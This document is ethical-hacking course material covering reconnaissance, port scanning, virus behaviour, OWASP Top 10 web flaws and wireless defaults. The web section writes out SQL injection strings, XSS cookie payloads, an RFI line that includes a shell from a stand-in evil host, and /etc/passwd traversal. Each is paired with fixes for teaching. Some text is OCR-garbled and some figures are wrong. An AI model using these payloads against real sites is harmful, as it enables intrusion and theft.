Course Material

Ethical Hacking & Information Security

By
Sunny Vaghela
www.sunnyvaghela.com
Head Office: A 805 Wallstreet 2,Opp Orient Club,Near Gujarat College,Ahmedabad 380007
Office: +91 79 40047405 , Mobile: +91 9898493002
Website: www.techdefence.com Email: info@techdefence.com
India Branch Offices: Vallabh Vidyanagar,Rajkot,Himmatnagar,Nashik,Hyderabad
International Offices: Australia, Mauritius
1

INDEX
Sr No.

Title

Ethical Hacking
1.1

Cyber Ethics

1.2

Information Gathering

1.3

Scanning

17

1.4 Virus, Worms & Trojans

22

Web Application Security

2.1

Page No.

Why Web Application Security?

27

2.2 Security Misconceptions

29

2.3 Reasons for Attacking Web Applications

30

2.4

OWASP Top 10 Vulnerabilities

31

2.5

Security guidelines

44

Wireless Hacking & Security

3.1

Wireless Standards

47

3.2

WEP & WPA Summery

55

3.3

Cracking WEP & WPA & Countermeasures

56

CHAPTER 1

Ethical Hacking

1.1

Cyber Ethics

1.2

Information Gathering

1.3

Scanning

1.4

Virus, Worms, Trojans and Virus analysis

1.1

CYBER ETHICS

Cyber ethics is a code of behavior for using the Internet. Since we are going to view
it as the hackers prospective, we will first dissect what the word hacker stands for?

Hacker:
A person, who delights in having an intimate understanding of the internal workings
of a system, computers and computer networks in particular. It is used to refer to someone
skilled in the use of computer systems, especially if that skill was obtained in an exploratory
way. The term is often misused in a pejorative context, where "cracker" would be the
correct term. And due to that the term evolved to be applied to individuals, with or without
skill, who break into security systems. Several subgroups of the computer are underground
with different attitudes and aims use different terms to demarcate themselves from each
other, or try to exclude some specific group with which they do not agree. In hackers
culture there are many different categories, such as white hat (ethical hacking), grey hat,
black hat and script kiddies. Usually the term cracker refers to black hat hackers, or more
generally hackers with unlawful intentions.

1. White Hat
A white hat is the hero or good guy, especially in computing slang, where it refers to an
ethical hacker or Penetration tester who focuses on securing and protecting IT systems.
White Hat Hackers, also known as Ethical Hackers, are Computer Security experts, who are
specialized in penetration testing, and other testing methodologies, to ensure that a
company's information systems are secure. Such people are employed by companies where
these professionals are sometimes called sneakers, tiger teams or red teams.

2. Grey Hat
A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts
legally, sometimes in good will, and sometimes not. They are a hybrid between white and
black hat hackers. They usually do not hack for personal gain or have malicious intentions,
but may or may not occasionally commit crimes during the course of their technological
4

exploits.

3. Black Hat
A black hat is the villain or bad guy. It refers to a hacker that breaks into networks or
computers, or creates computer viruses. Black Hat Hackers (also called "crackers") who
are specialized in unauthorized penetration of information systems. They may use
computers to attack systems for profit, for fun, or for political motivations or as a part of a
social cause. Such penetration often involves modification and/or destruction of data, and
is done without authorization and hence they should not be confused with ethical hackers.

4. Phreaker
Phreaking is a slang term coined to describe the activity of a subculture of people who
study, experiment with, or explore telecommunication systems, like equipment and systems
connected to public telephone networks. As telephone networks have become
computerized, Phreaking has become closely linked with computer hacking. This is
sometimes called the H/P culture (with H standing for Hacking and P standing for
Phreaking). The term "phreak" is a mixture of the words "phone" and "freak", and may also
refer to the use of various audio frequencies to manipulate a phone system. "Phreak",
"phreaker", or "phone phreak" are names used for and by individuals who participate in
phreaking.

5. Script Kiddies
In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, scriptrunning juvenile (SRJ), or similar, is a derogatory term used to describe those who use
scripts or programs developed by others to attack computer systems and networks.
It is generally assumed that script kiddies are like amateur kids who lack the ability to write
sophisticated hacking programs or exploits on their own, and that their objective is to try to
impress their friends or gain credit in underground hacker communities.

6.Hacktivists
Some people describing themselves as hacktivists have taken to defacing websites for
political reasons, such as attacking and defacing government websites as well as web sites
of groups who oppose their ideology. Hacktivist is a mixture of the words Hacker and
Activist. Their activities include many political ideals and issues. Hacktivism is a
5

controversial term. Some argue it was coined to describe how electronic direct action might
work toward social change by combining programming skills with critical thinking. Others
use it as practically synonymous with malicious, destructive acts that undermine the
security of the Internet as a technical, economic, and political platform.

Malicious Hacker Strategies :

As there are steps to develop any software so as Every hackers do follow some predefined
rules or steps to hack into the system. They are

Reconnaissance:- The basic information gathering about the target system.

Scanning:- Scanning the target system for open ports and services running on
the open ports etc.

Gaining Access:- Gaining the actual access of the particular target system by
exploiting the system.

Maintaining Access:- Keeping the access of the system even after leaving
the system so as not to perform all the steps from the scratch.

Clearing Tracks:- To remove the footprints if any so as to remain undetected

from the victim.

1.2

Information Gathering

Information Gathering Is initial process as far as hacking & investigation is

concerned. It is the process of profiling any organization , system , server or an individual
using methodological procedure.
Information gathering is used by attacker as well as investigator to get more information
about target.
Attackers point of view:
Attacker will first gather initial information like domain name , IPaddress , Network IP
range , operating system , services , control panel information , vulnerable services etc
before attacking into system.

Footprinting is required to ensure that isolated information repositories that are critical to
the attack are not overlooked or left undiscovered. Footprinting merely comprises on aspect
of the entire information gathering process, but is considered one of the most important
stages of a mature hack.

Attacker will take 90% of time in information gathering & only 10% of time while
attacking & gaining an access to the system
Investigators Point of view:
Investigator will gather initial information like traces of criminal on an internet, about his
name, occupation, address, contact number about his/her company/organization before
taking any legal action.

This will help investigator to profile the criminal & his/her activities properly during
interrogation.

Following are the various methodologies for information gathering.

1. Information Gathering using Search engine:

7

One leaves footprints/information everywhere while surfing internet. this is basic

principle for investigators as well as hackers. the only difference is the way they use this
information.

Attacker will gather information about the system, operating system, about vulnerable
application running on them & later on exploit it.

Investigator will gather information on how he got an access to system & where he left
his/her footprint behind on the same system & later on traced it.

Search engine are most powerful tool to search about any individual, organization & system

Following are the list of top 10 search engines:

Google Search Worlds most powerful search engine: www.google.com
Yahoo Search: www.search.yahoo.com
MSN Live Search: www.live.com
AOL Search: www.search.aol.in
Ask Search: www.ask.com
Altavista Search: www.altavista.com
Fast Search : www.alltheweb.com
Gigablast : www.gigablast.com
Snap Search: www.snap.com
2. Information gathering using relational search engine.
These type of search engines gets results from different search engine & make relation or
connections between those results.
Kartoo

Maltego
Maltego is an open source intelligence and forensics application. It allows for the mining
and gathering of information as well as the representation of this information in a
meaningful way.Coupled with its graphing libraries, Maltego, allows you to identify key
relationships between information and identify previously unknown relationships between
them. It is a must-have tool in the forensics.security and intelligence fields! Maltego offers
the user with unprecedented information. Information is leverage.

People Search Investigator can find personal information using people search.
9

People search will give information about phone number, address as well as background
info about the organizations.

Yahoo People Search - www.people.yahoo.com

Intellius:

Whois Lookup:
WHOIS (pronounced "who is"; not an acronym) is a query/response protocol which is
widely

used for querying an official database in order to determine the owner of a domain

name, an IP address, or an autonomous system number on the Internet. WHOIS lookups

were traditionally made using a command line interface, but a number of simplified web10

based tools now exist for looking up domain ownership details from different databases.
Web-based WHOIS clients still rely on the WHOIS protocol to connect to a WHOIS server
and do lookups, and command-line WHOIS clients are still quite widely used by system
administrators. WHOIS normally runs on TCP port 43.

Presently ICANN is undertaking a study to determine the uses and abuses of WHOIS
information. Other studies that are ongoing concern the accuracy of WHOIS information,
and the

effectiveness of the processes for reporting inaccurate public WHOIS

information.

Querying Regional Internet Registries:

WHOIS servers belonging to Regional Internet Registries (RIR) can be queried to
determine the Internet Service Provider responsible for a particular IP address. These
servers are:
ARIN - http://whois.arin.net
RIPE NCC - http://www.ripe.net/whois/
APNIC - http://whois.apnic.net
LACNIC - http://whois.lacnic.net
AfriNIC - http://whois.afrinic.net

The records of each of these registries are cross-referenced, so that a query to ARIN for a
record which belongs to RIPE will return a placeholder pointing to the RIPE WHOIS
server. This lets the WHOIS user making the query know that the detailed information
resides on the RIPE server. Apart from the RIRs mentioned above, there is also a
commercial global service: Routing Assets Database used by some large networks (eg.
large internet providers that acquired other ISPs in several RIR areas).

Domain Tools:

Whois.net
11

Samspade.org

.In registry

\
Example: www.techdefence.com whois info using www.domaintools.com

Above picture indicates that the website www.techdefence.com has title TechDefence
Consulting. Its Search Engine Optimization score is 62% for 23 terms.

12

Techdefence,com domain is registered from DIRECT INTERNET SOLUTIONS PVT

LTD.it also gives creation date,expiry date & last modified date of domain.
Name Servers ns1.hosthunger.com & ns2.hosthunger.com gives information about
hosting server.

Server Data is apache that means LINUX is operating system which is running on
techdefence
server.

IP address of Techdefence.com is 208.43.231.66

Server company is Softlayer Technologies
Domain Status is Active.

Registrant:
TechDefence Consulting Pvt Ltd
Sunny Vaghela

(sunny@sunnyvaghela.com)

Ahmedabad
Ahmedabad
Gujarat,380007
INDIA
Tel. +91.7926631931

The above information tells that domain techdefence.com is registered by Sunny Vaghela
from Ahmedabad.
13

Phone Number of Sunny Vaghela is +91 7926631931

Email Id used to register the same website is sunny@sunnyvaghela.com

Reverse IP Mapping:
Reverse IP mapping is the method to find number of websites hosted on same server.

Here by selecting the Reverse IP link we can get list of websites hosted on 208.43.231.66
along with techdefence.com

Trace Route:
Traceroute gives useful information regarding number of servers between your computers
& remote computers.

Useful for investigation as well as different attacks.

Visualroute, Neotrace.

NeoTrace gives MAP view,Node View as well as List View of number of nodes between
your computer & remote computer.
MAP View for www.techdefence.com

List View for techdefence.com

14

Node View for techdefence.com

Information of Server Node(last Node)

Geowhere:
Find websites using popular news groups.also finds out mailing lists,news groups & extract
information from 20 search engines.
15

Email Spiders
Email Spiders are automated softwares which captures email ids using spiders & store them
on the database. Spammers are using email spiders to collect thousand emails for spamming
purposes.

Other Tools: www.visualroute.visualware.com

www.samspade.org
www.dnsstuff.com
16

1.3

Scanning

Many time ago we scanned the different ports making telnet manually. Today
people use more sophisticated programs with massive methods to scan IP ranges searching
a lot of ports.

Scanning is the process of finding out open/close ports, vulnerabilities in remote system,
server & networks. Scanning will reveal IP addresses, Operating systems, Services running
on remote computer.
There are three types of scanning.
1. Port Scanning
2. Network Scanning
3. Vulnerability Scanning

Port Scanning:

Port Scanning is one of the most popular technique attacker use to discover the service they
break into.

All machines connected to a LAN or connected to Internet via a modem run many
services that listen at well-known and not so well-known ports.

There are 1 to 65535 ports are available in the computer.

By port scanning the attacker finds which ports are available .

Ports: The port numbers are unique only within a computer system.

Port numbers are 16-bit unsigned numbers.

The port numbers are divided into three ranges:

1. Well Known Ports (0..1023),

2. The Registered Ports (1024..49151),
17

3. The Dynamic and/or Private Ports (49152..65535).

Well Known Ports:

echo

7/tcp

Echo

ftp-data

20/udp

File Transfer [Default Data]

ftp

21/tcp

File Transfer [Control]

ssh

22/tcp

SSH Remote Login Protocol

telnet

23/tcp

Telnet

domain

53/udp

Domain Name Server

www-http 80/tcp

Smtp

25/tcp

Simple mail transfer protocol

Whois

43/tcp

whois server

World Wide Web HTTP.

Registered Ports:

wins

1512/tcp

Microsoft Windows Internet Name Service

radius

1812/udp

RADIUS authentication protocol

yahoo

5010

x11

6000-6063/tcp X Window System

Yahoo! Messenger

TCP Packet Header

SYN

ACK

RST

PSH

URG

FIN

TTL

WINDOW

SYN Synchronize it is used to initiate connection between hosts.

ACk Acknowledgement It is used to establish connection between hosts.

PSH push tells receiving system to send all buffer data.

URG urgent stats that data contain in packet should be process immediately.

FIN finish tells remote system that there will be no more transmission.

TTL Time to Live.

Open Scan
Known as TCP Scan and normally used to program sockets, this technique is the oldest and
works making a full connection with the server.

18

For that it makes an autentication with 3 packets. Is known ast hree-way-handshake:

For the ports opened:

Client ----> SYN ---->

<---- SYN/ACK <---- Server
Client ----> ACK ---->

For the ports closed:

Client ----> SYN ---->

<---- RST <---- Server

Advantages : very easy to program.

Disadvantages: is very easy to detect and make logs on each connection.

TCPConnect()

The connect() system call provided by an OS is used to open a connection to every

interesting port on the machine.

If the port is listening, connect() will succeed, otherwise the port isn't reachable.

Stealth Scan:

A stealth scan is a kind of scan that is designed to go undetected by auditing tools.

Fragmented Scan: The scanner splits the TCP header into several IP fragments.

This bypasses some packet filter firewalls because they cannot see a complete TCP
header that can match their filter rules.

SYN Scan:

This technique is called half open scanning because a TCP connection is not
completed .
19

A SYN packet is sent to remote computer.

the target host responds with a SYN+ACK, this indicates the port is listening and an
RST indicates a non- listener.

FIN Scan:

Another technique sends erroneous packets at a port, expecting that open listening
ports will send back different error messages than closed ports.

Closed ports reply to fin packets with RST.

Open ports ignore packets.

XMAS Scan:

XMAS uses scans where all flags in the TCP packet are set & sent to target host.

Closed ports reply to packets with RST.

Open ports ignore packets.

NULL Scan:

Null Scan used no flags of TCP header & it sent to the target host.

Closed ports reply to packets with RST.

Open ports ignore packets.

Port Scanner: NMAP

Nmap is powerful utility to scan large number of tools.

20

Provided with GUI as well as Command line interface.

It is supported by many operating systems.

It can carry out SYN Scan, FIN Scan, Stealth Scan, Half open scan & many other
types.

Network Scanners: Global Network Inventory Software:

21

1.4

Virus, Worms, Trojans and Virus analysis

Spyware

Spyware is a piece of software that gets installed on computer without your consent. It
collects your personal information without you being aware of it. It also Change how your
computer or web browser is configured and bombard you with online advertisements.
Spyware programs are notorious for being difficult to remove on your own and slow down
your PC. A program gets installed in the background while you are doing something else on
Internet.Spware has fairly widespread because your cable modem or DSL connection is
always connected.

Difference between Virus, Worms and Trojans

Virus is an application that self replicates by injecting its code into other data files. Virus
spreads and attempts to consume specific targets and are normally executables.
Worm copies itself over a network. It is a program that views the infection points another
computer rather than as other executables files on an already infected computer .
Trojan is a program that once executed performs a task other than expected.
Modes of Transmission
IRC
ICQ
Email Attachments
Physical Access
Browser & email Software Bugs
Advertisements
NetBIOS
Fake Programs Fake Programs

22

Virus Properties
Your computer can be infected even if files are just copied
Can be Polymorphic.
Can be memory or non-memory resident
Can be a stealth virus
Viruses can carry other viruses
Can make the system never show outward signs
Can stay on the computer even if the computer is formatted.

Virus Operation Phase

Most of the viruses operate in two phases.
1. Infection Phase In this phase virus developers decide
- When to Infect program
- Which programs to infect
Some viruses infect the computer as soon as virus file installed in computer. Some
viruses infect the computer as soon as virus file installed in computer.
Some viruses infect computer at specific date,time or perticular event.
TSR viruses loaded into memory & later infect the PCs.

2. Attack Phase - In this phase Virus will

- Delete files.
- Replicate itself to another PCs.
- Corrupt targets only

Virus Indications
Following are some of the common indications of Virus when it infects system.
Files have strange name than the normal.
File extensions can also be changed.
Program takes longer time to load than the normal.
Computers hard drives constantly runs out of free space
23

 Victim will not be able to open some programs.

Programs getting corrupted without any reasons.

Virus Types
Following are some of the common indications of Virus when it infects system.
Macro Virus Spreads & Infects database files.
File Virus Infects Executables.
Source Code Virus Affects & Damage source code.
Network Virus Spreads via network elements & protocols.
Boot Virus Infects boot sectors & records.
Shell Virus Virus Code forms shell around target hosts genuine program & host it as
sub routine.
Terminate & stay resident virus remains permanently in the memory during the work
session even after target host is executed & terminated.

Methods to Avoid Detection

1. Same last Modified Date.
In order to avoid detection by users, some viruses employ different kinds of
deception.
Some old viruses, especially on the MS-DOS platform, make sure that the "last
modified" date of a host file stays the same when the file is infected by the virus.
This approach sometimes fool anti-virus software.
2.

Overwriting Unused areas of the .exe files.

3.

Killing tasks of Antivirus Softwares.

Some viruses try to avoid detection by killing the tasks associated with antivirus
software before it can detect them.

4.

Avoiding Bait files & other undesirable hosts.

24

 Bait files (or goat files) are files that are specially created by anti-virus software, or by
anti-virus professionals themselves, to be infected by a virus.
Many anti-virus programs perform an integrity check of their own code.
Infecting such programs will therefore increase the likelihood that the virus is
detected.
Anti-virus professionals can use bait files to take a sample of a virus

5. Making stealth virus.

Some viruses try to trick anti-virus software by intercepting its requests to the
operating system.
The virus can then return an uninfected version of the file to the anti-virus
software, so that it seems that the file is "clean".

6.

Self Modification on each Infection.

Some viruses try to trick anti-virus software by modifying themselves on each
modifications
As file signatures are modified, Antivirus softwares find it difficult to detect.

7.

Encryption with variable key.

Some viruses use simple methods to encipher the code.
The virus is encrypted with different encryption keys on each infections.
The AV cannot scan such files directly using conventional methods.

Virus Analysis

1.

IDA Pro tool

It is dissembler & debugger tool

Runs both on Linux & windows

Can be used in Source Code Analysis, Vulnerability Research & Reverse

Engineering.

25

Autoruns :

Process Explorer

26

CHAPTER 2

Web Application
Hacking & Security

2.1

Why Web Application Security?

2.2

Security Misconceptions

2.3

Reasons for Attacking Web Applications

2.4

OWASP Top 10 Vulnerabilities

2.5

Security guidelines

2.6

Web Application Security checklist

27

2.1

Why Web Application Security?

Problem Illustration

Application Layer
Attacker sends attacks inside valid HTTP requests.
Your custom code is tricked into doing something it should not.
Security requires software development expertise, not signatures.
Network Layer
Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks
inside HTTP requests.
Security relies on signature databases
28

2.2 Security Misconceptions

The Firewall protects my web server and database

Access to the server through ports 80 and 443 makes the web server part of your
external perimeter defense.

Vulnerabilities in the web server software or web applications may allow

access to internal network resources

The IDS protects my web server and database

The IDS is configured to detect signatures of various well-known attacks.

Attack signatures do not include those for attacks against custom applications.

SSL secures my site

SSL secures the transport of data between the web server and the users browser.

SSL does not protect against attacks against the server and applications.

SSL is the hackers best friend due to the false sense of security.

The Source of Problem

Malicious hackers dont create security holes; they simply exploit them. Security holes
and vulnerabilities the real root cause of the problem are the result of bad software
design and implementation.
-

29

John Viega & Gary McGraw.

2.3 Reasons For Attacking Web Applications.

Vulnerability Used

30

2.4 OWASP TOP 10 VULNERABILITIES

1. INJECTION FLAWS

Injection means

Tricking an application into including unintended commands in the data

sent to an interpreter

Interpreters

Take strings and interpret them as commands.

SQL, OS Shell, LDAP, XPath, etc

SQL injection is still quite common.

Many applications still susceptible.

INJECTION FLAWS

1. Application presents a form to the attacker all via SSL.

2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user

31

SQL INJECTION

It is a flaw in "web application" development, it is not a DB or web server problem.

Most programmers are still not aware of this problem.

A lot of the tutorials & demo templates are vulnerable

Even worse, a lot of solutions posted on the Internet are not good enough.

In our pen tests over 60% of our clients turn out to be vulnerable to SQL
Injection

BUSINESS IMPACT OF SQL INJECTION

Attackers can

Access the entire database schema

Steal, modify, and delete database contents

Prevent legitimate access to the database

Run operating system commands on database server

Disclose company proprietary data

Common vulnerable login query

SELECT * FROM users WHERE login = 'victor' AND password = '123

(If it returns something then login!)

ASP/MS SQL Server login syntax

var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND
password = '" + formpwd + "'";

Injecting Through Strings

formusr = ' or 1=1

formpwd = anything

32

Final query would look like this:

SELECT * FROM users WHERE username = ' ' or 1=1

AND password = 'anything'

THE POWER OF

It closes the string parameter.

Everything after is considered part of the SQL command.

SELECT * FROM clients

WHERE account = 12345678
AND pin = 1111

PHP/MySQL login syntax

$sql = "SELECT * FROM clients WHERE " .

"account = $formacct AND " .
"pin = $formpin";
Injecting Numeric Fields

$formacct = 1 or 1=1 #
$formpin = 1111
Final query would look like this:

SELECT * FROM clients

WHERE account = 1 or 1=1
# AND pin = 1111
Standard SQL commands such as
"Select , "Insert, "Update, "Delete, "Create", and "Drop" can be used to
almost everything that one needs to do with a database.

When you click a link like this,

33

accomplish

www.site.com/news.asp5ArticleID=10,

The link tells the site to look in the table that stores
the article names for an article whos "ArticleID" is
10.

The "INFORMATION_SCHEMA" holds the names of every table and column on a site.
On every SQL server there will be an "INFORMATION_SCHEMA" and its name will
never change.

Understanding Error Messages

Example : www.site.com/index.php5id=1

Add or /* after id= 1 to check whether site is vulnerable or not.

If site is giving some error then site is vulnerable to SQL injection.

If blank page is shows then the site is vulnerable to blind injection.

Finding out Vulnerable Columns

Example : www.site.com/index.php5id=1+order+by+1 --

Increase order till you get an error message something like

Unknown Column in Order Clause

Extracting Information from database

www.site.com/index.php5id=1+union+all+select+1,table_name,3,4,5,6,7+from+informati
on_schema.tables

The above mentioned query gives names of tables stored in database.

www.site.com/index.php5id=1+union+all+select+1,column_name+3,4,5,6,7+from+infor
mation_schema.columns+where+table_schema=char()

The above mentioned query gives names of columns stored of all tables

SQL Injection Mitigation

Strong Design
34

Define an easy "secure" path to querying data

Use stored procedures for interacting with database

Call stored procedures through a parameterized API

Validate all input through generic routines

Use the principle of "least privilege"

Input Validation

Define data types for each field

Implement stringent "allow only good" filters

If the input is supposed to be numeric, use a numeric variable in your script

to

store it

Reject bad input rather than attempting to escape or modify it

Implement stringent "known bad" filters

For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--",
"'"

Harden the Server

Run DB as a low-privilege user account

Remove unused stored procedures and functionality or restrict

administrators

Change permissions and remove "public" access to system objects

Audit password strength for all user accounts

XSS ( Cross Site Scripting)

Occurs any time

Raw data from attacker is sent to an innocent user

Raw data

Stored in database

Reflected from web input (form field, hidden field, url, etc)

Sent directly into rich JavaScript client

35

access to

Virtually every web application has this problem

Try this in your browser javascript:alert(document.cookie)

Stored XSS

Reflected XSS

Business Impact of XSS

Attackers can

Steal user sessions for complete account takeover.

Steal data on web pages viewed by victim.

Deface pages viewed by victim.

Use web pages for phishing.

36

Finding XSS

Most Common Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there
are too many to mention.

Using 'Google Dorks search inurl: inurl:"search.php5q="

XSS Examples

http://site.com/search.php5q=<script>alert("XSS")</script>
http://site.com/search.php5q=<script>window.open(

"http://www.google.com/"

)</script>

Case Study: XSS

A British researcher, Jim Ley, discovered

(2004) a XSS flaw in Google and provided this
proof of concept Phishing page where Google
becomes a paying service. If you would be so
kind as to provide your credit card details .
Now fixed.

Finding XSS

Be sure that there is plan for input validation & encoding.

Be sure that it accepts all input data.

Positive Validation for all untrusted input fields.

HTML entity encoding method.

Fixing XSS

If you found XSS bugs in your scripts, its easy to secure, take a look at the below
code.
37

if(isset($_POST['form'])){echo

"<html><body>"

.$_POST['form'].

"</body></html>";}

Here the variable $_POST['from'] was coming from a input box, then you have a
XSS attack.

The following is a very easy way to secure that.

$charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES,

$charset);

if(isset($data)){echo "<html><body>" .$data. "</body></html>";}

This will take all possible code and make it not executable. by turning it into stuff
like &lt; etc...

$this = $_GET['id'];

echo "you are viewing " . $this . "blog";

If we include 5id=<script>alert("XSS")</script>

into the url its going to execute our code, a very easy way to secure this is using
(int) check the following code

$this = (int)$_GET['id'];

echo "you are viewing " . $this . "blog";

If at anytime the variable contains anything but a Integer, it will return 0.

Malicious File Inclusion - RFI

Malicious file execution vulnerabilities are found in many applications.

Developers will often directly use or concatenate potentially hostile input with file
or stream functions, or improperly trust input files.

On many platforms, frameworks allow the use of external object references, such
as URLs or file system references.

When the data is insufficiently checked, this can lead to arbitrary remote and
hostile content being included, processed or invoked by the web server.

38

Business Impact of RFI

This allows attackers to perform:

Remote code execution

Remote root kit installation and complete system compromise.

Remote shell installation

Remote modification & deletion of files on server.

RFI (Remote File Inclusion)

If allow_url_include is on in php.ini, we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a
non PHP extension):

Like http://www.techdefence.com/index.php5page=news.php

Now if the Index.php has Remote File Inclusion like

<?php

include($_GET[page]);

?>

So the above URL is written like

http://www.techdefence.com/index.php5page=http://www.evilscript.com/shell.txt

Fixing RFI

Practice Secure Coding Techniques

Instead of using $_GET use $_POST

39

Filter all the pages and Give file permissions perfectly so that no one can access.

Keep Safe Mode On in PHP.

Disallow unused commands in linux environment

Insecure Direct Object Reference /LFI (Local File Inclusion)

A direct object reference occurs when a developer exposes a reference to an

internal implementation object, such as a file, directory, database record, or key, as
a URL or form parameter.

An attacker can manipulate direct object references to access other objects

without authorization, unless an access control check is in place.

Insecure Direct Object Reference

Websites often use an include() system to display their pages, even more often this
system is insecure.

A practical example: index.php:

<?php
include($_GET['page'])
?>
which would result in a website with links such as: index.php5page=about.php
index.php5page=news.php

The simplest way to see if a script is vulnerable to local file inclusion, is this:

index.php5page=../../../../../../../../../etc/passwd

That Shows the complete User information in that server with paths..

Where ../ causes the script to move up one directory,

Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.

The result is
root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh ...on and on and on.

Fixing Insecure Direct Object Reference

40

Avoid exposing your private object references to users whenever possible, such as
primary keys or filenames.

Verify authorization to all referenced objects

Information Leakage and Improper Error Handling

Applications can unintentionally leak information about their configuration,

internal workings, or violate privacy through a variety of application problems.

Applications can also leak internal state via how long they take to process certain
operations or via different responses to differing inputs, such as displaying the
same error text with different error numbers.

Web applications will often leak information about their internal state through
detailed or debug error messages.

Improper Error Handling

Many security mechanisms fail to open

isAuthenticated()

isAuthorized()

isValid()

Bad logic (i.e., fail open)

41

if (!security_test())
then return false

return true

Good logic (i.e., fail secure)

if (security_test())
then return true

return false

Broken Authentication & Session Management

Proper authentication and session management is critical to web application

security.

Flaws in this area most frequently involve the failure to protect credentials and
session tokens through their lifecycle.

Business Impact of BA & SM

Attacker Can..

Hijack User Accounts

Hijack Administrative accounts.

Undermine authorization & accountability controls

Can Cause Privacy Violations

Fixing BA & SM

Only use the inbuilt session management mechanism.

Use a single authentication mechanism.

Do not allow the login process to start from an unencrypted page.

Ensure that every page has a logout link.

Use a timeout period.

Do not expose any session identifiers or any portion of valid credentials in URLs
or logs.
42

Failure to restrict URL Access

Frequently, the only protection for a URL is that links to that page are not
presented to unauthorized users.

However, a motivated, skilled, or just plain lucky attacker may be able to find and
access these pages, invoke functions, and view data.

Fixing Failure to restrict URL Access

Ensure the access control matrix is part of the business, architecture, and design of
the application

Ensure that all URLs and business functions are protected by an effective access
control mechanism.

Pay close attention to include/library files.

Do not assume that users will be unaware of special or hidden URLs or APIs

Keep up to date with virus protection and patches

43

2.5 Security Guidelines.

1. Validate Input and Output

2. Fail Securely (Closed)
3. Keep it Simple
4. Use and Reuse Trusted Components
5. Defence in Depth
6. Only as Secure as the Weakest Link
7. Security By Obscurity Won't Work
8. Least Privilege
9. Compartmentalization (Separation of Privileges)

Validate Input & Output

All user input and user output should be checked to ensure it is both appropriate
and expected.

Allow only explicitly defined characteristics and drop all other data.

Fail Securely

When it fails, it fails closed.

It should fail to a state that rejects all subsequent security requests.

A good analogy is a firewall. If a firewall fails it should drop all subsequent

packets

Keep It Simple

If a security system is too complex for its user base, it will either not be used or
users will try to find measures to bypass it.

This message applies equally to tasks that an administrator must perform in order
to secure an application.

This message is also intended for security layer API's that application developers
44

must use to build the system.

Use & Reuse Components

Using and reusing trusted components makes sense both from a resource stance
and from a security stance.

When someone else has proven they got it right, take advantage of it.

Defence In Depth

Relying on one component to perform its function 100% of the time is unrealistic.

While we hope to build software and hardware that works as planned, predicting
the unexpected is difficult. Good systems don't predict the unexpected, but plan
for it.

Only as Secure as the Weakest Link

Careful thought must be given to what one is securing.

Attackers are lazy and will find the weakest point and attempt to exploit it.

Security By Obscurity Won't Work

It's naive to think that hiding things from prying eyes doesn't buy some amount of
time.

This strategy doesn't work in the long term and has no guarantee of working in
the short term.

Least Privilege

Systems should be designed in such a way that they run with the least amount of
system privilege they need to do their job.

Compartmentalization (Separation of Privileges)

Compartmentalizing users, processes and data helps contain problems if they do

45

occur.

Compartmentalization is an important concept widely adopted in the information

security realm.

46

CHAPTER 3

Wireless
Hacking & Security

3.1

Wireless Standards

3.2

WEP & WPA Summery

3.3

Cracking WEP & WPA

47

3.1 Wireless Hacking

Wireless networking technology is becoming increasingly popular but at the same

time has introduced many security issues. The popularity in wireless technology is driven
by two primary factors - convenience and cost. A Wireless local area network (WLAN)
allows workers to access digital resources without being locked into their desks. Laptops
could be carried into meetings or even into Starbucks cafe tapping into the wireless
network. This convenience has become affordable.
Wireless LAN standards are defined by the IEEE's 802.11 working group. WLANs
come in three flavors:

802.11b

Operates in the 2.4000 GHz to 2.2835GHz frtequency range and can operate at up to 11
megabits per second.

802.11a

Operates in the 5.15-5.35GHz to 5.725-5.825GHz frequency range and can operate at up

to 54 mega bits per second.

802.11g

Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at
up to 54 megabits per second.
When setting up a WLAN, the channel and service set identifier (SSID) must be configured
in addition to traditional network settings such as IP address and a subnet mask.

The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the
frequency on which the network will operate.

48

The SSID is an alphanumeric string that differentiates networks operating on the same
channel.

It is essentially a configurable name that identifies an individual network. These

settings are important factors when identifying WLANs and sniffing traffic.

SSIDs
The SSID is a unique identifier that wireless networking devices use to establish and
maintain wireless connectivity. SSID acts as a single shared password between access points
and clients. Security concerns arise when the default values are not changed, as these units
can be easily compromised. A non-secure access mode, allows clients to connect to the
access point using the configured SSID, a blank SSID, or an SSID configured as "any."
Attackers Point of view:
If the target access point responds to a Broadcast SSID Probe, then he might just be
in luck. This is because most wireless card drivers are configured with an SSID of ANY so
that they will be able to associate with the wireless network. When the SSID is set to ANY,
the driver sends a probe request to the broadcast address with a zero-length SSID, causing
most access point that will respond to these requests to issue a response with its SSID and
info. Though this configuration makes it easier for the user, as the user does not have to
remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers
to gather SSIDs. Some of the common default passwords are:
3Com AirConnect 2.4 GHz DS (newer 11mbit, Harris/Intersil Prism based)
Default SSID: 'comcomcom'
3Com other Acccess Points
Default SSID: '3com'
Addtron (Model:?)
Default SSID: 'WLAN'
Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/e and BR4800

49

Default SSID: 'tsunami'; '2'

Console Port: No Default Password
Telnet password: No Default Password
HTTP management: On by default, No Default Password
Apple Airport
Default SSID: 'AirPort Network'; 'AirPort Netzwerk'
BayStack 650/660 802.11 DS AP
Default SSID: 'Default SSID'
Default admin pass: <none>
Default Channel: 1
MAC addr: 00:20:d8:XX:XX:XX
Compaq WL-100/200/300/400
Default SSID: 'Compaq'
Dlink DL-713 802.11 DS Access Point
Default SSID: 'WLAN'
Default Channel: 11
Default IP address: DHCP-administered
INTEL Pro/Wireless 2011 802.11 DSSS - PC Card
Default SSID: '101' ; 'xlan' ; 'intel' ; '195'

50

Default Channel: 3
INTEL Pro/Wireless 2011 802.11 DSSS - Access Point
Default SSID: '101' ; '195'
